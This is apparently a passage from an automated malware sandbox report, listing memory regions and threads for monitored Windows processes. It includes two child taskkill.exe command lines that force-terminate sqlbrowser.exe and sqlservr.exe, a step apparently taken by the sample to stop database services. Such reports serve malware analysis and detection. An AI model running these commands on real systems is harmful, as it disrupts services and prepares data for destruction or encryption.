"c:\\windows\\system32\\oleaut32.dll") Region: id = 2567 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2568 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2569 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2570 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2571 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2572 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2573 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2574 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2575 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2576 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2577 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2578 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2579 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2580 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2581 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2582 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2583 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 195 os_tid = 0x938 Thread: id = 225 os_tid = 0x8ec Thread: id = 229 os_tid = 0xb84 Thread: id = 233 os_tid = 0xc08 Thread: id = 234 os_tid = 0xc0c Process: id = "30" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7295c000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM sqlbrowser.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2272 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2273 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2274 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2275 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2276 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2277 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2278 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2279 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2280 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2281 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2282 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2283 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2284 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2285 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2286 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2677 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2678 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2679 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2680 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2681 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2682 start_va = 0x260000 end_va = 0x263fff entry_point = 0x260000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2683 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2684 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 2685 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2686 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2687 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 2688 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2689 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2690 start_va = 0x5d0000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 2691 start_va = 0x760000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2692 start_va = 0x1b60000 end_va = 0x1c1ffff entry_point = 0x1b60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2693 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 2694 start_va = 0x1d20000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 2695 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 2696 start_va = 0x1f20000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 2697 start_va = 0x1fa0000 end_va = 0x226efff entry_point = 0x1fa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2698 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2699 start_va = 0x24c0000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2700 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2701 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2702 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2703 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2704 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2705 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2706 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2707 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2708 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2709 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2710 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2711 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2712 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2713 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2714 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2715 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2716 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2717 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2718 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2719 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2720 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2721 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2722 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2723 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2724 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2725 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2726 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2727 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2728 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2729 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2730 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2731 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2732 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2733 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2734 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2735 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2736 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2737 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2738 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2739 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 211 os_tid = 0xb00 Thread: id = 235 os_tid = 0xc14 Thread: id = 242 os_tid = 0xc50 Thread: id = 245 os_tid = 0xc5c Thread: id = 246 os_tid = 0xc60 Process: id = "31" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x26d7c000" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM sqlservr.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2287 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2288 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2289 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2290 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2291 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2292 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2293 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2294 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2295 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2296 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2297 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2298 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2299 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2300 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2301 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2614 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2615 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2616 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2617 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2618 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2619 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2620 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2621 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2622 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2623 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2624 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2625 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2626 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2627 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2628 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2629 start_va = 0x1b90000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 2630 start_va = 0x1c10000 end_va = 0x1ccffff entry_point = 0x1c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2631 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 2632 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2633 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2634 start_va = 0x1f80000 end_va = 0x224efff entry_point = 0x1f80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2635 start_va = 0x2370000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 2636 start_va = 0x24c0000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2637 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2638 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2639 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2640 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2641 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2642 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2643 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2644 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2645 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2646 start_va = 